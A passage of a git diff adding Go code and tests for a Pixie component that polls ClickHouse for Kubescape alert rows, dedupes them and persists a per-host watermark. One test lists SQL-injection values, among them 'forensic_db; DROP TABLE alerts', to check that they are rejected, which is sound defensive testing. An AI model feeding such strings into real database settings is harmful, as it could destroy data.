"SELECT RuleID, RuntimeK8sDetails, RuntimeProcessDetails, event_time, hostname "+ + "FROM %s.%s "+ + "WHERE hostname = %s AND %s >= %d "+ + "ORDER BY %s LIMIT %d FORMAT JSONEachRow", + t.cfg.Database, t.cfg.Table, quoteCH(t.cfg.Hostname), + chNormEventTimeNanos, watermark, chNormEventTimeNanos, t.cfg.PollLimit)) + req, err := http.NewRequestWithContext(ctx, http.MethodGet, + t.cfg.Endpoint+"/?"+q.Encode(), nil) + if err != nil { + return nil, 0, err + } + if t.cfg.Username != "" { + req.SetBasicAuth(t.cfg.Username, t.cfg.Password) + } + resp, err := t.client.Do(req) + if err != nil { + return nil, 0, err + } + defer resp.Body.Close() + if resp.StatusCode/100 != 2 { + body, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + return nil, 0, fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(body))) + } + return parseJSONEachRow(resp.Body) +} + +// parseJSONEachRow streams JSONEachRow output line-by-line from r. +// Streaming (vs io.ReadAll into a []byte) bounds memory at one row +// regardless of how large the ClickHouse result set is. +// +// Malformed rows are LOGGED + SKIPPED, never fatal: a single bad line +// must not block watermark advancement and re-pin the bad row on every +// subsequent poll. Only an unrecoverable scanner error (e.g. line +// exceeds the 16 MiB buffer) fails the call. +func parseJSONEachRow(r io.Reader) ([]kubescape.Row, uint64, error) { + type rawRow struct { + RuleID string `json:"RuleID"` + RuntimeK8sDetails string `json:"RuntimeK8sDetails"` + RuntimeProcessDetails string `json:"RuntimeProcessDetails"` + EventTime json.RawMessage `json:"event_time"` + Hostname string `json:"hostname"` + } + var ( + rows []kubescape.Row + maxSeen uint64 + ) + scanner := bufio.NewScanner(r) + scanner.Buffer(make([]byte, 1<<20), 1<<24) + for scanner.Scan() { + line := bytes.TrimSpace(scanner.Bytes()) + if len(line) == 0 { + continue + } + var rr rawRow + if err := json.Unmarshal(line, &rr); err != nil { + log.WithError(err).Debug("trigger: skip malformed JSON row") + continue + } + ev, err := parseUint64Loose(rr.EventTime) + if err != nil { + log.WithError(err).Debug("trigger: skip row with bad event_time") + continue + } + rows = append(rows, kubescape.Row{ + EventTime: ev, + RuleID: rr.RuleID, + Hostname: rr.Hostname, + K8sDetails: rr.RuntimeK8sDetails, + ProcessDetails: rr.RuntimeProcessDetails, + }) + // maxSeen is the cursor max in NORMALIZED nanos (F8): with an + // unenforced unit the raw max is not necessarily the time-max. + if n := normalizeEventTimeNanos(ev); n > maxSeen { + maxSeen = n + } + } + if err := scanner.Err(); err != nil { + // Partial-read tolerance: return whatever parsed cleanly along + // with the error so the caller can still advance the watermark. + // Without this, an HTTP body read cut off mid-stream (the + // classic 5s-timeout-on-2GB-response failure mode) discarded + // ~all parsed rows and pinned the watermark in place. + return rows, maxSeen, err + } + return rows, maxSeen, nil +} + +func parseUint64Loose(raw json.RawMessage) (uint64, error) { + s := strings.TrimSpace(string(raw)) + s = strings.Trim(s, `"`) + return strconv.ParseUint(s, 10, 64) +} + +// chLiteralEscaper — hoisted to a package-level var so we don't allocate +// a Replacer per call (quoteCH is hot in rowFingerprint). +var chLiteralEscaper = strings.NewReplacer(`\`, `\\`, `'`, `\'`) + +func quoteCH(s string) string { + return "'" + chLiteralEscaper.Replace(s) + "'" +} diff --git a/src/vizier/services/adaptive_export/internal/trigger/clickhouse_internal_test.go b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_internal_test.go new file mode 100644 index 00000000000..8ca780fc3db --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_internal_test.go @@ -0,0 +1,104 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package trigger + +import ( + "context" + "net/http" + "net/http/httptest" + "strconv" + "strings" + "sync" + "testing" + "time" +) + +// TestNormalizeEventTimeNanos pins the unit normalization at the current epoch +// (the magnitude heuristic is exact for present-day timestamps). This is the +// core of the F8 fix: seconds, millis and nanos all map to the SAME nanos scale, +// so a mixed-unit row cannot drive the watermark past real seconds rows. +func TestNormalizeEventTimeNanos(t *testing.T) { + const sec = uint64(1781590000) // ~now in seconds + const milli = uint64(1781590000_000) // same instant in millis + const nano = uint64(1781590000_000000000) // same instant in nanos + cases := []struct { + in, want uint64 + }{ + {sec, nano}, + {milli, nano}, + {nano, nano}, + {0, 0}, + } + for _, c := range cases { + if got := normalizeEventTimeNanos(c.in); got != c.want { + t.Errorf("normalizeEventTimeNanos(%d) = %d, want %d", c.in, got, c.want) + } + } + // All three units for the SAME instant must collapse to one value, so the + // HWM cursor is unit-agnostic. + if normalizeEventTimeNanos(sec) != normalizeEventTimeNanos(nano) || + normalizeEventTimeNanos(milli) != normalizeEventTimeNanos(nano) { + t.Fatalf("same-instant s/ms/ns did not normalize equal: s=%d ms=%d ns=%d", + normalizeEventTimeNanos(sec), normalizeEventTimeNanos(milli), normalizeEventTimeNanos(nano)) + } +} + +// TestFetchSinceFiltersOnNormalizedEventTime asserts the trigger SELECT gates on +// the NORMALIZED event_time (server-side), not the raw column — the fix that +// stops a larger-unit row from poisoning the watermark (F8). It captures the +// query the trigger sends to ClickHouse. +func TestFetchSinceFiltersOnNormalizedEventTime(t *testing.T) { + var mu sync.Mutex + var gotQuery string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + q := r.URL.Query().Get("query") + mu.Lock() + gotQuery = q + mu.Unlock() + w.WriteHeader(200) // empty body = 0 rows, valid JSONEachRow + })) + defer srv.Close() + + trg, err := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: time.Second}) + if err != nil { + t.Fatalf("New: %v", err) + } + + const wmNanos = uint64(1781590000_000000000) + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + if _, _, err := trg.fetchSince(ctx, wmNanos); err != nil { + t.Fatalf("fetchSince: %v", err) + } + + mu.Lock() + q := gotQuery + mu.Unlock() + + if !strings.Contains(q, chNormEventTimeNanos) { + t.Errorf("query does not normalize event_time; want %q in:\n%s", chNormEventTimeNanos, q) + } + // The >= bound must compare the normalized expression against the nanos + // watermark, not the raw column. + wantPred := chNormEventTimeNanos + " >= " + strconv.FormatUint(wmNanos, 10) + if !strings.Contains(q, wantPred) { + t.Errorf("query filter is not normalized-vs-nanos-watermark; want %q in:\n%s", wantPred, q) + } + if strings.Contains(q, "event_time >= ") { + t.Errorf("query still uses RAW event_time filter (poison-prone):\n%s", q) + } +} diff --git a/src/vizier/services/adaptive_export/internal/trigger/clickhouse_test.go b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_test.go new file mode 100644 index 00000000000..0595e67392f --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_test.go @@ -0,0 +1,243 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package trigger + +import ( + "context" + "net/http" + "net/http/httptest" + "strings" + "sync/atomic" + "testing" + "time" +) + +const canonicalRowJSON = `{"RuleID":"R1005","RuntimeK8sDetails":"{\"podName\":\"redis-578d5dc9bd-kjj78\",\"podNamespace\":\"redis\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":106040,\"comm\":\"redis-server\"}}","event_time":"1744477360303026359","hostname":"node-1"}` + +// TestTrigger_Polls_HostnameAndWatermark — query carries +// WHERE hostname=… AND event_time>=… . Race-free: the server pushes +// each query string into a buffered channel; the test waits for the +// SECOND request deterministically (no fixed sleep, no shared +// non-atomic variable). +func TestTrigger_Polls_HostnameAndWatermark(t *testing.T) { + queries := make(chan string, 8) + var calls int64 + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + n := atomic.AddInt64(&calls, 1) + queries <- r.URL.Query().Get("query") + if n == 1 { + _, _ = w.Write([]byte(canonicalRowJSON + "\n")) + return + } + _, _ = w.Write([]byte("")) + })) + defer srv.Close() + tr, err := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + if err != nil { + t.Fatalf("New: %v", err) + } + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + select { + case ev := <-ch: + if ev.Target.Pod != "redis-578d5dc9bd-kjj78" { + t.Fatalf("Pod = %q", ev.Target.Pod) + } + if ev.Target.PID != 106040 { + t.Fatalf("PID = %d", ev.Target.PID) + } + if ev.Hostname != "node-1" { + t.Fatalf("Hostname = %q", ev.Hostname) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for first event") + } + // Drain the first query, then wait for the second (advanced + // watermark) — channel-based, so no fixed sleep races. + <-queries + var lastQuery string + select { + case lastQuery = <-queries: + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for second poll") + } + if !strings.Contains(lastQuery, "hostname = 'node-1'") { + t.Fatalf("query missing hostname filter: %q", lastQuery) + } + // post-#10/trigger-unit-normalize: SQL wraps event_time in multiIf(...); + // 1.744e18 is already ns-scale so it passes through unchanged. + if !strings.Contains(lastQuery, ") >= 1744477360303026359") { + t.Fatalf("watermark didn't advance to inclusive boundary: %q", lastQuery) + } +} + +// TestTrigger_RequiresHostname — defensive: refuses empty hostname. +func TestTrigger_RequiresHostname(t *testing.T) { + if _, err := New(Config{Endpoint: "http://x", Hostname: ""}); err == nil { + t.Fatalf("empty Hostname not rejected") + } +} + +// TestTrigger_ContextCancellationClosesChannel — clean shutdown. +func TestTrigger_ContextCancellationClosesChannel(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {})) + defer srv.Close() + tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + ch, _ := tr.Subscribe(ctx) + cancel() + select { + case _, ok := <-ch: + if ok { + t.Fatalf("channel produced after cancel") + } + case <-time.After(300 * time.Millisecond): + t.Fatalf("channel not closed within 300ms of cancel") + } +} + +// TestTrigger_HTTPErrorContinues — transient 5xx → retry, system stable. +func TestTrigger_HTTPErrorContinues(t *testing.T) { + var calls int64 + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + n := atomic.AddInt64(&calls, 1) + if n == 1 { + w.WriteHeader(503) + return + } + _, _ = w.Write([]byte(canonicalRowJSON + "\n")) + })) + defer srv.Close() + tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + select { + case ev := <-ch: + if ev.Target.Comm == "" { + t.Fatalf("got empty Target after recovery") + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("trigger did not recover from transient HTTP 503") + } +} + +// TestTrigger_DedupesAtWatermarkBoundary — same-event_time rows that +// arrive in a later poll than they were already observed must NOT be +// re-emitted. Distinct rows at the same boundary timestamp must still +// be emitted (only the duplicate is suppressed). +func TestTrigger_DedupesAtWatermarkBoundary(t *testing.T) { + const distinctRowJSON = `{"RuleID":"R0006","RuntimeK8sDetails":"{\"podName\":\"redis-578d5dc9bd-kjj78\",\"podNamespace\":\"redis\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":222222,\"comm\":\"redis-cli\"}}","event_time":"1744477360303026359","hostname":"node-1"}` + var calls int64 + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + n := atomic.AddInt64(&calls, 1) + switch n { + case 1: + // First poll emits the canonical row. + _, _ = w.Write([]byte(canonicalRowJSON + "\n")) + case 2: + // Second poll: server "re-discovers" the SAME row at the + // boundary timestamp PLUS one DISTINCT row at the same + // event_time. The trigger must suppress the duplicate + // fingerprint and pass through the distinct one. + _, _ = w.Write([]byte(canonicalRowJSON + "\n" + distinctRowJSON + "\n")) + default: + _, _ = w.Write([]byte("")) + } + })) + defer srv.Close() + + tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + + // Collect events for ~250 ms — long enough for at least 3 polls. + deadline := time.Now().Add(250 * time.Millisecond) + var got []uint64 // PIDs we observed + for time.Now().Before(deadline) { + select { + case ev := <-ch: + got = append(got, ev.Target.PID) + case <-time.After(20 * time.Millisecond): + } + } + // Expect exactly 2 events: PID 106040 (canonical, emitted once + // even though server returned it twice) and PID 222222 (distinct + // row at same boundary, emitted exactly once). + if len(got) != 2 { + t.Fatalf("got %d events, want 2 (canonical + distinct, no dup); pids=%v", len(got), got) + } + canonicalSeen, distinctSeen := 0, 0 + for _, pid := range got { + switch pid { + case 106040: + canonicalSeen++ + case 222222: + distinctSeen++ + } + } + if canonicalSeen != 1 { + t.Fatalf("canonical row emitted %d times, want 1 (dedup failed)", canonicalSeen) + } + if distinctSeen != 1 { + t.Fatalf("distinct same-event_time row emitted %d times, want 1 (over-aggressive dedup)", distinctSeen) + } +} + +// TestTrigger_RejectsInvalidIdentifiers — defensive: SQL injection via +// Database/Table config is refused at construction time. +func TestTrigger_RejectsInvalidIdentifiers(t *testing.T) { + for _, bad := range []string{ + "forensic_db; DROP TABLE alerts", + "db with space", + "123starts_with_digit", + "backtick`injection", + "forensic_db.kubescape_logs", // dotted not allowed for this table param + } { + _, err := New(Config{Endpoint: "http://x", Hostname: "node-1", Database: bad}) + if err == nil { + t.Errorf("New accepted bad Database %q; expected error", bad) + } + _, err = New(Config{Endpoint: "http://x", Hostname: "node-1", Table: bad}) + if err == nil { + t.Errorf("New accepted bad Table %q; expected error", bad) + } + } +} + +// TestTrigger_BadRowSkipped — incomplete kubescape row is skipped, good rows still arrive. +func TestTrigger_BadRowSkipped(t *testing.T) { + bad := `{"RuleID":"","RuntimeK8sDetails":"","RuntimeProcessDetails":"","event_time":"1","hostname":"node-1"}` + "\n" + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + _, _ = w.Write([]byte(bad + canonicalRowJSON + "\n")) + })) + defer srv.Close() + tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + select { + case ev := <-ch: + if ev.Target.Comm != "redis-server" { + t.Fatalf("got Comm %q; bad row leaked through", ev.Target.Comm) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("good row not received after bad-row skip") + } +} diff --git a/src/vizier/services/adaptive_export/internal/trigger/fingerprint_bench_test.go b/src/vizier/services/adaptive_export/internal/trigger/fingerprint_bench_test.go new file mode 100644 index 00000000000..2924b2b4df7 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/trigger/fingerprint_bench_test.go @@ -0,0 +1,142 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package trigger + +import ( + "crypto/sha256" + "encoding/hex" + "fmt" + "strings" + "testing" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape" +) + +// rowFingerprint is the deduper for boundary rows at each poll. It +// runs ONCE PER kubescape row pulled from ClickHouse by the trigger +// (clickhouse.go:272-273). With PollLimit=10000 and a 250ms ticker, a +// trigger that's catching up from a stale watermark can process 40k +// rows/sec PURELY in the fingerprint loop — every one of which: +// +// 1. Allocates a fresh sha256 hasher (sha256.New). +// 2. Runs fmt.Fprintf with %d/%s verbs into the hasher (uses reflect). +// 3. Hex-encodes the 32-byte digest into a 64-char string. +// +// The bench numbers below quantify that. If the per-row cost is +// significant, the trigger backlog drain itself is a CPU consumer +// independent of any downstream work. + +func benchKubescapeRow(i int) kubescape.Row { + // K8sDetails / ProcessDetails are JSON blobs in production — + // kubescape emits them at ~500 bytes typical, ~2KB upper. + const k8sDetails = `{"podNamespace":"log4j-poc","podName":"backend-vulnerable-779cd9d765-mxr8t","containerName":"backend","workloadName":"backend-vulnerable","workloadKind":"Deployment","image":"ghcr.io/k8sstormcenter/log4j-chain-backend-vulnerable:latest","clusterName":"soc-demo-pg","nodeName":"node-1"}` + const procDetails = `{"comm":"java","pid":1234,"ppid":1,"path":"/usr/lib/jvm/java-11/bin/java","argv":["java","-cp","/app/log4j-vuln-1.0.jar","com.example.App"],"user":"appuser","cwd":"/app","spawn_time":"2026-06-07T18:00:00Z"}` + return kubescape.Row{ + EventTime: uint64(1_700_000_000_000_000_000 + i), + RuleID: "R1100", + Hostname: "pixie-worker-node", + K8sDetails: k8sDetails, + ProcessDetails: procDetails, + } +} + +func BenchmarkRowFingerprint(b *testing.B) { + row := benchKubescapeRow(0) + b.ReportAllocs() + b.ResetTimer() + for i := 0; i < b.N; i++ { + _ = rowFingerprint(row) + } +} + +// BenchmarkRowFingerprint_Unique varies event_time per call so the +// hasher gets unique input bytes (matches real boundary-row behaviour +// where each row has its own event_time). +func BenchmarkRowFingerprint_Unique(b *testing.B) { + rows := make([]kubescape.Row, 1024) + for i := range rows { + rows[i] = benchKubescapeRow(i) + } + b.ReportAllocs() + b.ResetTimer() + for i := 0; i < b.N; i++ { + _ = rowFingerprint(rows[i%len(rows)]) + } +} + +// BenchmarkRowFingerprint_LargePoll simulates one trigger poll +// draining PollLimit=10000 rows — the boundary-dedup pass after a +// stale-watermark catchup. The trigger does this ONCE per +// PollInterval (250ms default) when there's a backlog; under a +// 100ms-jitter ticker drift this can run 4-10× per second. +func BenchmarkRowFingerprint_LargePoll(b *testing.B) { + const batch = 10_000 + rows := make([]kubescape.Row, batch) + for i := range rows { + rows[i] = benchKubescapeRow(i) + } + b.ReportAllocs() + b.ResetTimer() + for n := 0; n < b.N; n++ { + for i := range rows { + _ = rowFingerprint(rows[i]) + } + } +} + +// BenchmarkRowFingerprintSimple_LargePoll uses an alternative +// allocation-free fingerprint (sha256-of-concatenated-strings via a +// builder + direct Write). Lets us compare the current Fprintf-based +// implementation's reflect-driven cost against a hand-rolled version +// — informs whether replacing the fmt.Fprintf is a worthwhile +// micro-optimisation if the standard bench shows the trigger +// fingerprint as a CPU hotspot. +func BenchmarkRowFingerprintSimple_LargePoll(b *testing.B) { + const batch = 10_000 + rows := make([]kubescape.Row, batch) + for i := range rows { + rows[i] = benchKubescapeRow(i) + } + b.ReportAllocs() + b.ResetTimer() + for n := 0; n < b.N; n++ { + for i := range rows { + _ = fingerprintNoFmt(rows[i]) + } + } +} + +// fingerprintNoFmt is the Fprintf-free reference. Same output guarantee +// is NOT asserted here — this is a perf-comparison anchor only. If the +// numbers diverge by >2× from rowFingerprint, the fmt.Fprintf path is +// a real cost. +func fingerprintNoFmt(r kubescape.Row) string { + h := sha256.New() + var b strings.Builder + b.Grow(64 + len(r.RuleID) + len(r.Hostname) + len(r.K8sDetails) + len(r.ProcessDetails)) + _, _ = fmt.Fprintf(&b, "%d", r.EventTime) + b.WriteByte(0) + b.WriteString(r.RuleID) + b.WriteByte(0) + b.WriteString(r.Hostname) + b.WriteByte(0) + b.WriteString(r.K8sDetails) + b.WriteByte(0) + b.WriteString(r.ProcessDetails) + h.Write([]byte(b.String())) + return hex.EncodeToString(h.Sum(nil)) +} diff --git a/src/vizier/services/adaptive_export/internal/trigger/integration_test.go b/src/vizier/services/adaptive_export/internal/trigger/integration_test.go new file mode 100644 index 00000000000..c8a42f73575 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/trigger/integration_test.go @@ -0,0 +1,149 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +//go:build integration +// +build integration + +package trigger_test + +import ( + "context" + "fmt" + "io" + "net/http" + "net/url" + "os" + "strings" + "testing" + "time" + + chpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger" +) + +// Live integration test for the trigger's poll loop. Inserts a +// kubescape_logs row directly via HTTP, then asserts the trigger +// surfaces it as a kubescape.Event before the deadline. + +func env(t *testing.T) (endpoint, user, pass string) { + t.Helper() + endpoint = os.Getenv("INTEGRATION_CH_ENDPOINT") + if endpoint == "" { + t.Skip("INTEGRATION_CH_ENDPOINT not set; skipping live ClickHouse test") + } + return endpoint, os.Getenv("INTEGRATION_CH_USER"), os.Getenv("INTEGRATION_CH_PASSWORD") +} + +func ensureSchema(t *testing.T, endpoint, user, pass string) { + t.Helper() + a, err := chpkg.NewApplier(endpoint, user, pass) + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + if err := a.Apply(ctx); err != nil { + t.Fatalf("Apply (precondition): %v", err) + } +} + +// insertKubescapeRow shoves one synthetic row into kubescape_logs via +// JSONEachRow on the HTTP interface — same shape Vector emits. +func insertKubescapeRow(t *testing.T, endpoint, user, pass, hostname, ruleID string, eventTime uint64) { + t.Helper() + body := fmt.Sprintf( + `{"BaseRuntimeMetadata":"{\"alertName\":\"%s\"}","CloudMetadata":"","RuleID":"%s","RuntimeK8sDetails":"{\"podName\":\"redis-test\",\"podNamespace\":\"redis\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":1234,\"comm\":\"redis-server\"}}","event":"","event_time":%d,"hostname":"%s"}`, + ruleID, ruleID, eventTime, hostname, + ) + q := url.Values{} + q.Set("query", "INSERT INTO forensic_db.kubescape_logs FORMAT JSONEachRow") + req, err := http.NewRequest(http.MethodPost, + strings.TrimRight(endpoint, "/")+"/?"+q.Encode(), + strings.NewReader(body)) + if err != nil { + t.Fatal(err) + } + req.Header.Set("Content-Type", "application/x-ndjson") + if user != "" { + req.SetBasicAuth(user, pass) + } + resp, err := (&http.Client{Timeout: 10 * time.Second}).Do(req) + if err != nil { + t.Fatalf("seed insert: %v", err) + } + defer resp.Body.Close() + if resp.StatusCode/100 != 2 { + buf, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + t.Fatalf("seed insert HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(buf))) + } +} + +// TestTriggerSubscribe_Live: insert one row, expect one Event from the +// trigger's Subscribe channel within the deadline. +func TestTriggerSubscribe_Live(t *testing.T) { + endpoint, user, pass := env(t) + ensureSchema(t, endpoint, user, pass) + + hostname := fmt.Sprintf("aw-trig-%d", time.Now().UnixNano()) + now := time.Now() + eventTime := uint64(now.UnixNano()) + + // Use a watermark slightly before the synthetic event_time so the + // first poll picks up exactly our row, regardless of unrelated rows + // in the table from earlier runs. + cfg := trigger.Config{ + Endpoint: endpoint, + Username: user, + Password: pass, + Hostname: hostname, + PollInterval: 200 * time.Millisecond, + InitialWatermark: eventTime - 1, + } + trg, err := trigger.New(cfg) + if err != nil { + t.Fatalf("trigger.New: %v", err) + } + + ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second) + defer cancel() + ch, err := trg.Subscribe(ctx) + if err != nil { + t.Fatalf("Subscribe: %v", err) + } + + insertKubescapeRow(t, endpoint, user, pass, hostname, "R1005", eventTime) + + select { + case ev, ok := <-ch: + if !ok { + t.Fatalf("channel closed before event arrived") + } + if ev.RuleID != "R1005" { + t.Errorf("Event.RuleID = %q, want R1005", ev.RuleID) + } + if ev.Hostname != hostname { + t.Errorf("Event.Hostname = %q, want %q", ev.Hostname, hostname) + } + if ev.EventTime != eventTime { + t.Errorf("Event.EventTime = %d, want %d", ev.EventTime, eventTime) + } + if ev.Target.Pod != "redis-test" || ev.Target.Namespace != "redis" { + t.Errorf("Event.Target = %+v, want pod=redis-test, ns=redis", ev.Target) + } + case <-ctx.Done(): + t.Fatalf("trigger did not surface the seeded row within 15s") + } +} diff --git a/src/vizier/services/adaptive_export/internal/trigger/watermark.go b/src/vizier/services/adaptive_export/internal/trigger/watermark.go new file mode 100644 index 00000000000..6d6d98daa87 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/trigger/watermark.go @@ -0,0 +1,127 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package trigger + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/chhttp" +) + +// WatermarkStore persists the trigger's per-(hostname,table) cursor +// across operator restarts. Without persistence, every restart on a +// busy node replays kubescape_logs from event_time=0 — multi-GiB +// single-shot SELECTs that the trigger's HTTP client times out on, +// pinning the watermark at 0 forever. +// +// Load returns (watermark, true, nil) when a row exists, or +// (0, false, nil) when no row exists yet (fresh cluster). An error +// returned from Load or Save is logged + non-fatal: the trigger falls +// back to whatever cold-start strategy the caller chose. +type WatermarkStore interface { + Load(ctx context.Context, hostname, table string) (uint64, bool, error) + Save(ctx context.Context, hostname, table string, watermark uint64) error +} + +// ClickHouseWatermarkStore is the production WatermarkStore — reads +// and writes forensic_db.trigger_watermark over the same HTTP endpoint +// as the rest of the operator. Schema is owned by the clickhouse +// package's Apply (CREATE TABLE IF NOT EXISTS at boot). +type ClickHouseWatermarkStore struct { + database string + c *chhttp.Client +} + +// NewClickHouseWatermarkStore validates the endpoint and returns a +// ready store. timeout=0 → chhttp default (watermark IO is tiny, but +// we share the operator's overall conservative network-call budget). +func NewClickHouseWatermarkStore(endpoint, database, user, pass string, timeout time.Duration) (*ClickHouseWatermarkStore, error) { + if database == "" { + database = "forensic_db" + } + if !validIdentifier(database) { + return nil, fmt.Errorf("watermark: invalid database identifier %q", database) + } + c, err := chhttp.New(endpoint, user, pass, timeout) + if err != nil { + return nil, fmt.Errorf("watermark: %w", err) + } + return &ClickHouseWatermarkStore{database: database, c: c}, nil +} + +// Load returns the most-recent persisted watermark for (hostname, table). +// Uses FINAL — the table is ReplacingMergeTree, and per-(hostname,table) +// cardinality is one, so the cost is negligible. (false, nil, nil) means +// no row exists for the key yet — the trigger's caller chooses cold-start. +func (s *ClickHouseWatermarkStore) Load(ctx context.Context, hostname, table string) (uint64, bool, error) { + body, err := s.c.Query(ctx, fmt.Sprintf( + "SELECT watermark FROM %s.trigger_watermark FINAL "+ + "WHERE hostname = %s AND table_name = %s LIMIT 1 FORMAT JSONEachRow", + s.database, quoteCH(hostname), quoteCH(table))) + if err != nil { + return 0, false, fmt.Errorf("watermark load: %w", err) + } + body = bytes.TrimSpace(body) + if len(body) == 0 { + return 0, false, nil + } + // JSONEachRow returns watermark as a JSON number; UInt64 values + // above 2^53 lose precision through float64, so we accept either + // number or string and parse strictly as uint64. + var raw struct { + Watermark json.RawMessage `json:"watermark"` + } + if err := json.Unmarshal(bytes.Split(body, []byte{'\n'})[0], &raw); err != nil { + return 0, false, fmt.Errorf("watermark load: parse response: %w", err) + } + wm, err := parseUint64Loose(raw.Watermark) + if err != nil { + return 0, false, fmt.Errorf("watermark load: %w", err) + } + return wm, true, nil +} + +// Save inserts a new row. ReplacingMergeTree(updated_at) merges later; +// reads via FINAL always return the freshest. Write is fire-and-merge +// — no UPDATE semantics, no contention with concurrent INSERTs from +// other operator instances (each pins its own hostname). +func (s *ClickHouseWatermarkStore) Save(ctx context.Context, hostname, table string, watermark uint64) error { + row, err := json.Marshal(struct { + Hostname string `json:"hostname"` + TableName string `json:"table_name"` + Watermark uint64 `json:"watermark"` + UpdatedAt string `json:"updated_at"` + }{ + Hostname: hostname, + TableName: table, + Watermark: watermark, + UpdatedAt: time.Now().UTC().Format("2006-01-02 15:04:05.000000000"), + }) + if err != nil { + return err + } + if _, err := s.c.Insert(ctx, + fmt.Sprintf("INSERT INTO %s.trigger_watermark FORMAT JSONEachRow", s.database), + row, chhttp.InsertOptions{}); err != nil { + return fmt.Errorf("watermark save: %w", err) + } + return nil +} diff --git a/src/vizier/services/adaptive_export/internal/trigger/watermark_test.go b/src/vizier/services/adaptive_export/internal/trigger/watermark_test.go new file mode 100644 index 00000000000..d0cf8aa818a --- /dev/null +++ 